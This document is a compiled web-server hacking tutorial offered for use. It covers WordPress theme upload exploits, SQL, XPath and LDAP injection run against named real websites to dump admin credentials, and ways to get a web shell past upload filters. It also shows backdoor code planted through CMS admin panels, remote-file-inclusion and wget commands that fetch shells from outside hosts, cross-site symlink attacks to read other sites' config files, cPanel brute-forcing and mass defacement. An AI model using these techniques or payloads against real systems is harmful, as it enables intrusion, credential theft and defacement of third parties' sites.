Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

2. Wordpress Dimension Themes CSRF File Upload Vulnerability

Dork :
inurl:wp-content/themes/dimension

Exploit & POC :
http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-
handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

File Access :

http://site-target/uploads/[years]/[month]/your_shell.php

Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

3. Wordpress Euclid Themes CSRF File Upload Vulnerability

Dork :

inurl:wp-content/themes/euclid_v1

Exploit & POC :

http://site-target/wp-content/themes/euclid/functions/upload-handler.php
http://site-target/wp-content/themes/euclid_v1.x.x/functions/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/euclid/functions/upload-handler.php"
method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

File Access :

http://site-target/uploads/[years]/[month]/your_shell.php

Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

4. Wordpress theCotton Themes CSRF File Upload Vulnerability

Dork :

inurl:wp-content/themes/thecotton_v114/
Exploit & POC :

http://site/[patch]/wp-content/themes/thecotton_v114/lib/utils/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-
content/themes/make_a_statement/library/includes/upload-handler.php"
method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

Server Side Includes | Server Side Inclusion :

1) Introduction Server Side Includes

Server Side includes enables us to do some things faster on sites. Over SSIncludes we ca update
DB, send mails and many other functions. SSI is working like when some run script on that site.
Default extension for SSI files is .shtml
To get SSI working in that directory where is .shtml is located must be .htaccess file, which
holds some configuration included inside file.
SSIs is by default disabled you can enable it by creating new .htaccess file with this config:
Code:
AddType text/html .shtml
AddHandler server-parsed .shtml
AddHandler server-parsed .html
Options Indexes FollowSymLinks Includes

2) SSI creating

We are starting script with 
Code:
<command> -
config
include
flow
set
printenv
echo
exec
fsize
flastmod
time & date

With --> we end script.

script e.g.
Code:



3) Server Side Inclusion

Server Side Inclusion Attack is very useful attacking method. For this it's recommended to have
primary knowledge of Bash and Batch programming.

Site is vulnerable on SSI when extensions ‘.shtml’ ‘.shtm’ or ‘.stm’, are included in Apache
config file.
e.g. we can create file with next command:
Code:


Save this as .shtml file and open it on site.

I think you already know what is going to happen.
Hope this helped you!

Symlink Attack :
1] Upload shell 404.php
2] Upload contact.php & database.php

> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/contact.php

3] go to [sec. info] in your shell then [readable : etc/passwd <view>]
4] copy all username & passwd from [ etc/passwd ]
5] paste in [ http://site.com/contact.php ] [ config fucker ] tab.
6] now open your both links : [ http://site.com/database.php & http://site.com/configweb ]

> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/configweb/

7] on configweb page [ you have some text that contain user & password ] [ these files are
reverse or linked website details ]
8] Now login to them using database.php [ change password in database ]
9] login to main site then and deface there index.php page.
Malware Attachment On Website :
1] Go to Public Html tab on your 404.php shell &
2] Open .htaccess on your shell
3] and past your malware coading.

Sql injection String & Union based :
1. Sql injection String based
[1] Decreption
In String based Sql injection :
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln
to SQLi)

[2] Example
Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with
SQLi
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query
id=X' order by--+
Alright that you've got the point lets try String Based on some of the other types of SQL
injection shall we
String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
http://www.site.com/index.php?id=234' order by 11--+
Results show error, so we'll assume as 10 columns, since it'll be an example for our process
2. Obtaining the Databases

http://www.site.com/index.php?id=-234' UNION SELECT
1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of
my tutorials to progress further in this step
3.Obtaining the Tables from the current Database
http://www.site.com/index.php?id=-234' UNION SELECT
1,2,3,4,5,group_concat(table_name,0x0a),7,8,9,10 from information_schema.tables where
table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"
4. Obtaining Column names from a specific table (which in this example is "admin")
http://www.site.com/index.php?id=-234' UNION SELECT
1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where
table_name=0x61646d696e--+
Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php
For this example, we'll use "username" and "password" as our column names
5.Obtaining Data from Column names
http://www.site.com/index.php?id=-234' UNION SELECT
1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+
6. Example :
1. http://www.onthegro.co.za/content.php?id=latest_news'
2. http://www.onthegro.co.za/content.php?id=latest_news' order by 1000 --+
3. http://www.onthegro.co.za/content.php?id=latest_news' order by 1 --+
4. http://www.onthegro.co.za/content.php?id=latest_news' order by 2 --+
5. http://www.onthegro.co.za/content.php?id=latest_news' order by 3 --+
6. http://www.onthegro.co.za/content.php?id=latest_news' order by 4 --+
7. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,3,4 --+
8. http://www.onthegro.co.za/content.php?id=-latest_news' order by
1,2,group_concat(schema_name,0x0a),4 from information_schema.schemata --+

9. http://www.onthegro.co.za/content.php?id=-latest_news' order by
1,2,group_concat(table_name,0x0a),4 from information_schema.tables where
table_schema=database()--+
10. http://www.onthegro.co.za/content.php?id=-latest_news' order by
1,2,group_concat(column_name,0x0a),4 from information_schema.columns where
table_name=0x61646d696e--+
11. http://www.onthegro.co.za/content.php?id=-latest_news' order by
1,2,group_concat(username,0x3a,password,0x0a),4 from admin--+

2. Sql injection Union based :
[1] Example
http://www.naukriguru.com
1. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 100
2. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 10
3. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 20
4. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 50
5. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 40
6. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 30
7. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 35
8. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 33
9. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 32
10. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 31
11. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
12. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
13. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
14. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
15. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
,30,31—
16. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2
9,30,31—

17. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28,29,30,31—
18. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28,29,30,31—
19. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,
25,26,27,28,29,30,31 from information_schema.tables where table_schema =
database()—
20. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,
24,25,26,27,28,29,30,31 from information_schema.columns where table_name =
0x6e675f61646d696e—
21. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat(id,0x3a,loginid,0x3a,email,0x3a,password,0x3a,name,0x3a,type,0x3a),
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from
ng_admin—
22. http://www.naukriguru.com/admin/
23. http://www.naukriguru.com/admin/index.php#
24. http://www.naukriguru.com/admin/add_industry.php

Xpath Injection :
Step 1: Inject --> +and extractvalue(rand(),concat(0x0a,version()))--
Eg:
http://www.viratcooker.com/recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,vers
ion()))--
msg: Could not query:XPATH syntax error: ' 5.5.32-cll'
=====================================================================
Step 2: [Find Tables] Inject --> +and extractvalue(rand(),concat(0x0a,(select
concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database()
limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from
/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :RecipeIngredients'
---------------------------------------------------------------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from
/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 1,1)))--+
msg: Could not query:XPATH syntax error: ' :SS_categories'
---------------------------------------------------------------------------------------------------------------------
Respectively :~ For 2,3,4,5,6,7,8.....
msg : Could not query:XPATH syntax error: ' :SS_ordered_carts'
Could not query:XPATH syntax error: ' :SS_orders'
Could not query:XPATH syntax error: ' :SS_products'
Could not query:XPATH syntax error: ' :SS_products2'
Could not query:XPATH syntax error: ' :SS_special_offers'
Could not query:XPATH syntax error: ' :categories'

Could not query:XPATH syntax error: ' :details'
Could not query:XPATH syntax error: ' :productrange'
Could not query:XPATH syntax error: ' :recipes'
Could not query:XPATH syntax error: ' :visitors'
=====================================================================
Note : Convert table name to HEX [String to hex conversion]
Eg : details : 64657461696c73 or 0x64657461696c73
=====================================================================
Step 3: [Finding Columns] Inject --> +and extractvalue(rand(),concat(0x0a,(select
concat(0x3a,column_name) from information_schema.columns WHERE
table_name=0x64657461696c73 limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,column_name) from
/*!information_schema.columns*/ /*!WHERE*/ /*!column_name=0x64657461696c73*/ limit
0,1)))--+
msg: Could not query:XPATH syntax error: ' :cust_firstname'
---------------------------------------------------------------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Respectively :~ For 2,3,4,5,6,7,8.....
msg: Could not query:XPATH syntax error: ' :cust_lastname'
msg: Could not query:XPATH syntax error: ' :cust_country'
msg: Could not query:XPATH syntax error: ' :cust_zip'
msg: Could not query:XPATH syntax error: ' :cust_state'
msg: Could not query:XPATH syntax error: ' :cust_city
msg: Could not query:XPATH syntax error: ' :cust_address'
=====================================================================
Note : In case I got :

Table -> users
Columns -> Password & Email
So,
=====================================================================
Step 4: Fetching Details Inject ---> +and extractvalue(rand(),concat(0x0a,(select
concat(email,0x3a,password) from users limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(email,0x3a,password) from
/*!users*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :email:password'

=====================================================================
=====================================================================

LDAP injections :

---[ 0x01: Introduction ]

The technique of LDAP (Lightweight Directory Access Protocol) is
a lightweight
protocol to access the directory service X.500. This protocol
works over TCP/IP.
The access protocol LDAP is used to query and modify obj ects
stored.

---[ 0x02: Filters LDAP ]

It is quite important to understand how does the LDAP filters
work.
FC 4515 (6/2006) (http://tools.ietf.org/html/rfc4515).

Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = | filterlist
Not = ! filter
Filterlist = 1*filter
Item = simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = "=" /"~="/ ">=" / "<="
Present = attr = *
Substring = attr "=" [initial] * [final]
Initial = assertionvalue
Final = assertionvalue

Logical operators:
- AND "&"
- OR "|"
- NOT "!"

Relational operators:
<=, >=, =, ~=

The wildcard "*" It is used to replace characters.

Filter example:
(&(objectClass=user)(uid=*)): We return a list of all objects of
type user, no matter

which takes the value of the attribute "uid."

---[ 0x02: LDAP injection in Web Applications ]

The technique Ldap injection is very similar to SQL injection.
The attack technique is used to operate websites built LDAP
judgments directly from
data supplied by the user.

Vulnerable code with comments (by Sacha Faust):

+++++++++++++++++++++++++++++++++++++

line 0: <html>
line 1: <body>
line 2: <%@ Language=VBScript %>
line 3: <%
line 4: Dim userName
line 5: Dim filter
line 6: Dim ldapOb j
line 7:
line 8: Const LDAP_SERVER = "ldap.example"
line 9:
line 10: userName = Request.QueryString("user")
line 11:
line 12: if( userName = "" ) then
line 13: Response.Write("<b>Invalid request. Please
specify a valid user name</b><br >")
line 14: Response.End()
line 15: end if
line 16:
line 17:
line 18: filter = "(uid=" + CStr(userName) + ")" '
searching for the user entry
line 19:
line 20:
line 21: 'Creating the LDAP object and setting the base dn
line 22: Set ldapObj =
Server.CreateObject("IPWorksASP.LDAP")
line 23: ldapObj.ServerName = LDAP_SERVER
line 24: ldapObj.DN = "ou=people,dc=spilab,dc=com"
line 25:
line 26: 'Setting the search filter
line 27: ldapObj.SearchFilter = filter
line 28:
line 29: ldapObj.Search
line 30:

line 31: 'Showing the user information
line 32: While ldapObj.NextResult = 1
line 33: Response.Write("<p>")
line 34:
line 35: Response.Write("<b><u>User information for : "
+ ldapObj.AttrValue( 0) + "</u></b><br>")
line 36: For i = 0 To ldapObj.AttrCount -1
line 37: Response.Write("<b>" + ldapObj.AttrType(i)
+ "</b> : " + ldapObj.AttrValue(i) + "<br>" )
line 38: Next
line 39: Response.Write("</p>")
line 40: Wend
line 41: %>
line 42: </body>
line 43: </html>

+++++++++++++++++++++++++++++++++++++

In line 10 note userName variable is initialized with the value
the parameter user and then quickly validated to see if the
value is zero.
If the value is not zero, the variable userName is used to
initialize the
variable filter on line 18.
This new variable is used directly to build an LDAP search to be
used in
the call to SearchFilter on line 27
The attacker has full control over what will be consulted on the
LDAP server.
You will get the result of the consultation when the code
reaches of the line 32 to 40,
all results and its attributes are displayed to the user.

Example 1:
http://website/ldap.asp?user=*

In this example dispatched the character "*" paramete r in the
"user" which ends
in the variable filter.
This judgment LDAP will show any object that has an attribute
uid.
We show all users and their information.

Example 2:
http://website/ldap.asp?user=ka0x)(|(homedirectory=*)

It will show us the path to t he user ka0x.
They can do tests with the code before they leave.

---[ 0x03: Links ]

http://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protoc
ol
http://es.wikipedia.org/wiki/LDAP
http://www.ldapman.org/

__EOF__

# milw0rm.com [2007-11-04]

© Offensive Security 2011

Part 2
Web server Hacking
Using above vulnerabilities various type of hacks that can be used to hack web
server.

Guide content:

 Shell Uploading Guide
 Shell uploading through php-my-admin
 Shell Jumping
 Symlink Bypass 2013 for Linux Servers
 Hack Web-DAV & Deface
 Root server without local root exploit
 LINUX SERVER ROOTING Tutorial
 Cpanel Cracking
 Bypass 403 Forbidden And Cant Read /Etc/Named.Config Error
 Backdoor a WEB SERVERS WITH WEBACOO
 Web Server Hacking through Command Injection
 How To Hack Windows Servers Using Dubrute 2.2
 Symlink Tutorial for beginners
 MASS DEFACE TUTORIAL
 How to hack a websites using Symlink Bypassing
 ATTACKING WEBSERVERS VIA .HTACCESS
 How to Back-connect with netcat
 Hacking Cold Fusion Servers - Part I
 Hacking Cold Fusion Servers - Part II

So let’s get started !
1. Shell Uploading Guide

Many newbie’s face problem while uploading shell on a site after getting admin access/ logging
in to that site. So, I am writing this in order to help them. Basically shell gives us remote access
to that server. Such shells are available in different language like php, asp/aspx, cgi etc. So, we
have to choose a shell that will work on the server according to the server script. If the server
supports php shell then we have to choose any of the php shell Otherwise asp & cgi. now, let’s
come to the Main point…. AFTER LOGGING IN TO THE SITE IF WE FOUND ANY
UPLOAD OPTION IN THE SITE , THEN WE CAN EASILY UPLOAD SHELL. But
sometimes we have to do some changes to upload a shell.

Way 1
AS THE SHELL IS IN PHP FORMAT, SOMETIMES SOME SITES DOES NOT ALLOW
UPLOADING SUCH SCRIPTS DIRECTLY WITH THE PHP EXTENTION. If so happens then
just rename the shell name. Add .gif/.jpg/.html/.doc etc. Example: suppose before renaming the
shell name was shell.php, then we will rename it as shell.php.jpg or anything else.

Way 2
Upload a simple uploader shell first that isn’t detected by Antivirus and firewalls. THEN
UPLOAD YOUR SHELL THROUGH YOUR OWN SHELL. YOU CAN DOWNLOAD A
UPLOADER SHELL FROM HERE .

WAY 3
FEW FIREWALL OF THE SERVER DETECTS THE SHELL SCRIPT BY CHECKING THE
headers & don’t allow us to upload a shell. so we can bypass it by using “GIF89A SHELL
SCRIPT BYPASS” Method. open your shell in notepad. add “GIF89a;” without quote before the
shell code starts. liKe below…
GIF89a;

Depending on what kind of file validation they are using this may fool the Server Into thinking
its a image since when it reads the file it finds the gif header and assuMes its safe since it’s a
iMage.
WAY 4
This method is more advanced. This only works for client side filters rather than server side.
download firebug for Firefox, then edit the html of the upload .
<form enctype=\"multipart/form-data\" action=\"uploader.php\" method=\"POST\"> Upload
DRP File: <input name=\"Upload Saved Replay\" type=\"file\" accept=\"*.jpg\"/><br /> <input
type=\"submit\" value=\"Upload File\" /> </form>

Change the filter accept. to *.* or just remove it completely , it will then let you upload any type
of file.

WAY 5
Download “LIVE HTTP HEADERS” addon first for your firefox browser
1. Rename your shell name to shell.php.jpg (or whatever that site supports. In my case, site
supports only jpg file. Thats why i renamed it to shell.php.jpg.)
2. Open Firefox & Start your Live HTTP Headers addon, after that upload your shell.
3. Then your Live HTTP Headers will look something similar to this

4. Then click on the shell.php.jpg, after click on Reply button.
5. Then again a new window will open, in that window there will be two boxes, but we have to
work on second box.
6. In the second box, rename your shell.php.jpg to shell.php, then again click on Reply button

WAY 6
Find yourself a copy of edjpgcom.exe "edjpgcom is a free Windows application that allows you
to change (or add) a JPEG comment in a JPEG file." Usage: -- edjpgcom "filename.jpg" Now
add this to the jpg comment since you wont be able to drop a whole shell in there due to limits
etc.
"; system($_GET['cmd']); echo ?>

now rename your jpg to .php and upload.

WAY 7
Another way you can fool the web server into thinking your uploading a image instead of a php shell is to
get Firefox and install the “tamperdata” Add on then click start tamper and upload your php shell then
tamper the data and change the content-Type from 'application/octet-stream' to 'image/jpeg'. If u have any
problem to upload a shell using tamperdata, then just do a simple google search. So many video tutorials
on this is available in web. So I am not explaining this step by step.

WAY 8
All the above mention way works when we find an upload button on the site. but when there is no upload
button, it’s not easy to upload a shell there. we can try few things…… We have to find out if there is a
edit option of an existing php/asp/aspx page. If there is a edit option then open that page & delete whole
script. After that, open your shell in notepad. Copy the script, paste to that page. Finally, save it. Now that
link will be your shell. possibly we can find edit option in the following pages of a site……
Contact us.php/ Contact us.asp
Class.php/ Class.asp
About us.php/about us.asp
Terms.php/terms.asp
nb: in some news, vehicles shelling, cart etc sites, don’t have any option to upload a file after logging in
through admin panel. They only allow file upload after logging through cpanel.

WAY 9
SOME TIMES, IN SOME REMOTE FILE INCLUSION Vulnerable SITES, WE HAVE TO EXECUTE
A SHELL FROM ANOTHER HOSTING SITE. METHOD……..
1) UPLOAD YOUR SHELL IN A FREE HOSTING SITE LIKE www.my3gb.com www.3owl.com ,
www.ripway.com , , www.000webhost.com , etc.
2) Now suppose your shelled site link is www.example.my3gb.com/c99.txt & YOUR VULNERABLE
SITE IS www.site.com
3) Now we have to execute this following command to gain shell access to that site.
http://www.site.com/v2/index.php?page=http://www.example.my3gb.com/c99.txt
4) REPLACE THE SITE LINK IN THE COMMAND ACCORDING TO YOUR SHELL &
VULERABLE SITE LINK.
SHELL UPLOADING IN joomla, wp, vb, smf, ipb, mybb SITES

IN THOSE ABOVE MENTIONED SITE WE CANT FIND DIRECT UPLOAD OPTION
GENERALLY. SO WE HAVE TO DO THEM IN OTHER WAYS.

1.Joomla Site:
After Login into adminpanel u will find Extensions on 5th No. expand this click on it > template Manager
> check on any template (like beez,ja_purity) Now click on Edit (right upper side) after this click on Edit
html now paste ur shell code and click save...done site.com/templates/template name/index.php like
site.com/templates/beez/index.php

2.Wordpress:
login into admin panel expand Appearance then click on editor > u will find style.css
now select 404.php on right side paste ur shell code and click edit file u can find
shell in site.com/wp-content/themes/theme name u edit/404.php

3.Vbulletin:
1-Log in admin cp
2-Under “Plugins & Products”, select Add New Plugin
3-Adjust the settings as follows: Product: vBulletin Hook Location: global_start Title: (Anything …)
Execution Order:
5 Code:
ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean();

Plugin is Active : Yes
4-After the plugin is added, go to the heading “Style and Design”, select “Style Manager
5-Under whatever the default style is in the dropdown menu, select Edit Templates.
6-Scroll ForumHome models and expand. Click [Customize] beside FORUMHOME.
7-Search Code:
$header Somewhere near the top. Replace it with: Code: $header $execcode

8-Now go to the forum and add after the index.php
Code:
?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php

So it looks like Code:
http://www.site.com/pathtoforum/index.php?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php

What this does is shell.txt downloads, and renames shell.php Now, the shell must be located in the
directory shell.php forums … If not, then wget is disabled on that server, you can try alternative methods:
http://www.site.com/pathtoforum/index.php?cmd=curl http://www.site.com/shell.txt > shell.php

http://www.site.com/pathtoforum/index.php?cmd=GET http://www.site.com/shell.txt shell.php

4.SMF:
login into admin panel u need to download any smf theme in zip format and put ur shell.php in it and save
admin panel > select Themes and Layout > Install a new theme > browse and upload theme thats have our
shell.php :) after upload shell will find > site.com/Themes/theme name/shell.php

5.IPB:
login admin panel > Look and Feel >Manage Languages, choose language > section (example)
public_help edit: help.txt Choose topic from list, or search for a topic In right box add the below code:
${${print $query='cd cache; wget http://link_to_shell/shell.txt;mv shell.txt shell.php'}} ${${system($query,$out)}}
${${print $out}}

When you add it, specify go on bottom Now we go on
http://www.site.com/index.php?app=core&module=help And our code we add will be done, and you will
get your shell @ www,site.com/cache/shell.php

6.phpBB
login into admin panel > go on styles -> templates -> edit, for Template file choose faq_body.html At
down of:

We add:
fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i]));

And save it.Now go on:
www.site.com/forum/faq.php?o=shell.php&i=http://link_to_shell.com/shel l.txt shell find in site
path/shell.php

Mybb forum login admincp > Go to Templates and Styles, find default MyBB Theme is. Then
go to Templates, expand templates that are used by the current theme. Find Calendar templates,
click it. Click 'calender'. Above all the html code, paste this:http://pastebin.com/nA3asuNz
save :) shell will b find in site.com/calendar.php
note: if u got error like "code is danger unable to edit " then simply paste ur deface code to
deface calendar.php

Tutorial shell uploading through phpmyadmin
Requirements:-
-You must have the full path
-pma & mysql db privileges.
Its not every day u get to use this its rare, but today i exploited a site by this so
thought of writing a tutorial. Ok then lets start.

First login in to mysql

now click 'Show MySQL system varible"

then 'SQL'.

now you can run sql commands,like create db, delete tables or whatever. we want to upload shell
so lets move on to it.
now we will create a cmd line into a new file,with select into.

SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "full/path/here/cmd.php"

and click 'Go'.

Now, the cmd line is here http://site.com/cmd.php lets run the command to get shell.

wget http://www.r57.biz/r57.txt;mv r57.txt shell.php

N thats it, we have shell on the server xD

Shell Jumping

Requirement : shell b374k
(Click On the link you will get a php file just right click and select save or press ctrl+ s From
Keyboard save it by any name like hacker.php, myshell.php or darksite.php )
Follow these steps
 Now after uploading shell Click On Local Domain To view all websites based on same
server Check for readable
 Now choose any website from Local host domain list and copy Senarai User value then
goto home and paste in view file/folder after home/replacethiskeyword/public_html/
for example current view file/folder value = home/abc/public_html and your website's
Senarai User value (username) is xyz then view file/folder value will be
home/xyz/public_html/
 After Going to that Folder Look for MySQL confiq (wp-config.php in wordpress and
configuration.php for joomla ) now open The file and you'll Got database username and
password here :
it will Looks like
Username = /** MySQL database username */ define('DB_USER', 'googlyma_wrdp1');

PASSWORD =
/** MySQL database password */
define('DB_PASSWORD', 'PHZ2hum6{{KE');

 Now Conncet to MYSQL datbase with username and Password and enter this SQL Query

UPDATE wp_users SET user_pass =md5( '123456') WHERE user_login = 'admin';

 Now what we have did it
goto : http://webste.com/wp-admin/ and login with Username and password

Log in with user name admin and password as 123456 And You have successfully done it.

Symlink Bypass 2013 for Linux Servers

Note : This method is not applicable for Godaddy , Bluehost , Hostgrator and Hostmonstor
Servers .
For This First You Need the Following Files :
 Sen Haxor CGI Shell
 sen.zip
 passwd-bypass.php
 Turbo Brute force Cpanel
 Port.py
First Before Starting to symlink we need to create php.ini and ini.php to Disable Safe mode
and Disabled Functions on the server .
Use the Following Code : Make a php.ini with the following code safe_mode=Off And ini.php
with 

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

So after creating php.ini and ini.php upload the other files to the server .
BYPASSING SYMLINK ON PLESK , DEBIAN , CENTOS & REDHAT SERVERS
Now i will explain how to bypass symlink on Plesk , Debian , Centos and Redhat
Commonly all of the above have root path like
/root/var/www/vhost/
where all sites will be under vhost directory . But you wont have permission to view it so we
will create a symbolic link to root and view the site and symlink the config files
Make a new directory in your shell example sen then upload sen.zip . Then use this command to
unzip the file and create a symbolic link to root .
Command : unzip sen.zip
Note : In some servers unzip command wont work so you can manually create a symlink to root
by using the command ln -s / root
Then You will see this
$ unzip sen.zip
Archive: sen.zip

linking: sen.txt -> /
finishing deferred symbolic links:
sen.txt -> /
This means a symbolic link has been created to / root .
 Now we need to upload .htaccess use the following
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
Done Bypassed Now View /var/www/vhost/ and you will be displayed with all sites .
BYPASSING SYMLINK ON APACHE AND LITESPEED
Mostly when you try to symlink apache in 2013 server you will face 403 forbidden or 404 not
found and 500 Internel Server Error
These can be Bypass By Using Different .htaccess individually.
BYPASSING SYMLINK ON APACHE & LITESPEED - Linux Servers .
First for this make a new directory in your shell example sen then upload sen.sa and .htaccess
from the Sen Haxor CGI shell which i added the download link at the end of the Tutorial
After uploading .htaccess and sen.sa to a new directory sen chmod sen.sa to 0755
Then Open the Cgi Shell Login ( Password : senhaxor)
Now there are several methods to bypass 403 forbidden You need to try all the following
methods . Atleast one will give you success .
Method 1 : .shtml method
This is the commonly used method by most of the hackers to bypass 403 forbidden Error .
So before we procced first you need to get all /etc/passwd from the server so that we can find the
username and path of where the sites are located .
2013 Server mostly Many functions are enabled which shows 403 forbidden when you try to
read cat /etc/passwd from the server

so i made a Powerfull Shell which can bypass and get /etc/passwd from the server.
I will also add it to the Downloads.
Upload the /etc/passwd bypasser shell and get all /etc/passwd
Then Login to Sen Haxor CGI Shell and create a symbolic link to your Target
 Step 1 : ln -s / root
 Step 2 : ln -s /home/username/public_html/config.php 1.shtml
Example if our site is www.site.com and username is site and its Wordpress
ln -s /home/site/public_html/wp-config.php 1.shtml
So we created a Symbolic link to our Target now you need to Go to Your Shell and Edit the
.htaccess with the following Code :
Options +FollowSymlinks
DirectoryIndex itti.html
RemoveHandler .php
AddType application/octet-stream .php
Once you done this Open the 1.shtml on your Browser and rightclick and view source . You will
be able to View the Config .
This is the common way of Bypass 403 forbidden and Litespeed .
Now Let Me Explain You the Advanced Method =)
Method 2 : Bypassing Symlinked Config From Cpanel
For This You need atleast One Cpanel Access on the sever . I will tell you how to easily crack
Cpanel .
First Run This Command : ls /var/mail
Then you will be displayed with all username from the server Copy all .
Now Upload Turbo Brute Force Cpanel Script ( i will attach it will the downloads).
Open the Script and in User Paste all the username we got .
And for Password here is the wordlist :

Copy All and Paste it on Password Select Simple and Click Submit
If Your lucky you will be displayed with cracked cpanels.
Once you got a cpanel on the server You can Bypass 500 Internel Server Error 403 Forbidden
Error From Port :2077 and From error-pages from file manager.
Just symlink the config
ln -s /home/user/public_html/wp-config.php config.shtml
Login to the cpanel
Then Go to File Manager -> Error Pages
Then Choose any of these according to what error is triggered when you open your symlinked
config
400 (Bad request)
401 (Authorization required)
403 (Forbidden)
404 (Not found)
500 (Internal server error)
Example "&file=400.shtml&desc=(Bad request)
we can get the config by
